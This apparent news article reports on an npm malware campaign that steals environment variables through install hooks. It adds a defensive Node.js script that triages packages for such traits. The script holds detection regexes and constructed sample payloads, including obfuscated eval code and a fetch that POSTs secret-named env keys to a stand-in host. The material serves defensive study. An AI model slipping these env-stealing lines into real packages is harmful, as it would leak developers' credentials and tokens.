
Mini Shai-Hulud malware hits 314 npm packages
The Mini Shai-Hulud malware has compromised 314 npm packages by injecting obfuscated malicious code, according to SafeDep.
The Mini Shai-Hulud malware has compromised 314 npm packages by injecting obfuscated code that exfiltrates environment variables and system information [SafeDep]. The payloads are hidden in package scripts, typically lifecycle hooks such as postinstall that npm runs automatically during installation, or in module code that fires when the package is loaded, and they contact command-and-control servers to send the stolen data [SafeDep].
SafeDep traced the attack to recently published or updated packages with names resembling legitimate tools—such as @utils/core-helper and react-render-hooks—that gained quick adoption due to misleading documentation and high search rankings. Some packages had thousands of weekly downloads before being flagged.
The malware evades detection by using domain generation algorithms (DGAs) for its C2 infrastructure, so there is no fixed domain to blocklist, and by activating only on systems that do not look like analysis sandboxes. It targets credentials, API keys, and session tokens stored in environment variables, which makes it particularly dangerous for CI/CD pipelines and production deployments, where long-lived secrets are routinely injected exactly that way.
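Concretely, the two traits described above (an install-time lifecycle hook, and obfuscated code that enumerates process.env and reaches out to the network) can be triaged statically before a package is allowed into a build. The following Node.js script is an added example written for this page; it is not SafeDep's tooling and not code from the campaign. The package manifests, file contents, package names and indicator patterns in it are constructed for illustration.

```javascript
// Added example (not SafeDep's tooling and not code from the campaign):
// static triage of npm packages for the two traits the article describes,
// install-time lifecycle hooks and obfuscated, env-stealing payload code.
// Every package below is CONSTRUCTED for illustration; the names, files and
// indicator list are assumptions of this example.

// npm runs these hooks during `npm install` / `npm ci` unless ignore-scripts is set.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Cheap static indicators; each is weak alone, so they are only counted together.
const INDICATORS = [
  { name: "eval-or-Function", re: /\beval\s*\(|new\s+Function\s*\(/ },
  { name: "hex-escaped-strings", re: /(?:\\x[0-9a-f]{2}){4,}/i },
  { name: "long-base64-literal", re: /["'`][A-Za-z0-9+/]{80,}={0,2}["'`]/ },
  { name: "env-enumeration", re: /JSON\.stringify\s*\(\s*process\.env\s*\)|Object\.(?:keys|entries|values)\s*\(\s*process\.env\s*\)/ },
  { name: "network-egress", re: /\brequire\s*\(\s*["'](?:https?|net|dns|child_process)["']\s*\)|\bfetch\s*\(/ },
];

// Returns the names of every indicator that fires on a piece of source text.
function scanText(text) {
  return INDICATORS.filter(({ re }) => re.test(text)).map(({ name }) => name);
}

// pkg = { name, packageJson, files: { "relative/path.js": "source" } }
function triagePackage(pkg) {
  const scripts = (pkg.packageJson && pkg.packageJson.scripts) || {};
  const hooks = LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === "string");
  const hits = new Set();
  // The hook command itself can carry the payload (e.g. `node -e "..."`).
  for (const h of hooks) scanText(scripts[h]).forEach((i) => hits.add(i));
  // Module code is scanned too: a payload that waits for require() has no hook.
  for (const [file, src] of Object.entries(pkg.files || {})) {
    if (/\.(c|m)?js$/.test(file)) scanText(src).forEach((i) => hits.add(i));
  }
  const indicators = [...hits].sort();
  let verdict = "ok";
  if (hooks.length > 0 && indicators.length >= 2) verdict = "block";
  else if (hooks.length > 0 || indicators.length >= 2) verdict = "review";
  return { name: pkg.name, hooks, indicators, verdict };
}

const SAMPLE_PACKAGES = [
  {
    name: "sample-pad", // constructed: plain library, no hooks
    packageJson: { scripts: { test: "node test.js" } },
    files: { "index.js": "module.exports = (s, n, c = ' ') => String(s).padStart(n, c);" },
  },
  {
    name: "sample-core-helper", // constructed: hook plus obfuscated env exfiltration
    packageJson: { scripts: { postinstall: "node setup.js" } },
    files: {
      "setup.js": String.raw`
const _0xab = ["\x68\x74\x74\x70\x73", "\x72\x65\x71\x75\x65\x73\x74"];
const https = require("https");
const payload = Buffer.from(JSON.stringify(process.env)).toString("base64");
eval(Buffer.from("dm9pZCAw", "base64").toString());`,
    },
  },
  {
    name: "sample-native-addon", // constructed: legitimate-looking hook, nothing else
    packageJson: { scripts: { postinstall: "node-gyp rebuild" } },
    files: { "index.js": "module.exports = require('./build/Release/addon.node');" },
  },
  {
    name: "sample-runtime-stealer", // constructed: no hook, fires when required
    packageJson: { main: "index.js" },
    files: {
      "index.js": String.raw`
const host = ["c2", "example"].join(".");
const keys = Object.keys(process.env).filter((k) => /TOKEN|KEY|SECRET/.test(k));
fetch("https://" + host + "/c", { method: "POST", body: JSON.stringify(keys) });`,
    },
  },
];

function triageAll(pkgs = SAMPLE_PACKAGES) {
  return pkgs.map(triagePackage);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const r of triageAll()) {
    console.log(`${r.verdict.padEnd(7)} ${r.name}  hooks=[${r.hooks}]  indicators=[${r.indicators}]`);
  }
}

if (typeof module !== "undefined") {
  module.exports = { triagePackage, triageAll, scanText, LIFECYCLE_HOOKS, INDICATORS };
}
```

In practice the same function would be fed from a walk of node_modules (each package's package.json plus its .js files) in a CI step that runs before any lifecycle script is allowed to execute. The verdicts are deliberately conservative: a hook alone yields review rather than block, because native addons and build tools legitimately use postinstall, and the indicators are cheap regexes that a determined obfuscator can dodge. The cheapest control against the install-time trigger is to disable hooks entirely with npm ci --ignore-scripts (or ignore-scripts=true in .npmrc) and run any genuinely needed build steps explicitly. Because the C2 domains are generated rather than fixed, a static domain blocklist will not stop exfiltration; restricting outbound network access from build hosts and keeping long-lived secrets out of the process environment are the complementary controls.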
SafeDep identified overlapping code signatures and infrastructure with earlier Mini Shai-Hulud campaigns dating back to 2022, suggesting a persistent actor reusing and refining the same tooling. The group has previously targeted PyPI and RubyGems, indicating a cross-platform supply chain strategy.
npm has since removed the compromised packages, but the speed and scale of the campaign expose critical gaps in automated scanning and reputation-based trust models. Developers often install packages based on name familiarity or download volume, and attackers now exploit both signals systematically.
The incident underscores how easily malicious actors can weaponize npm's open publishing model. Unlike ecosystems with stricter curation or mandatory code review, npm lets any registered account publish a package immediately, with no pre-publication review, leaving a persistent attack surface.


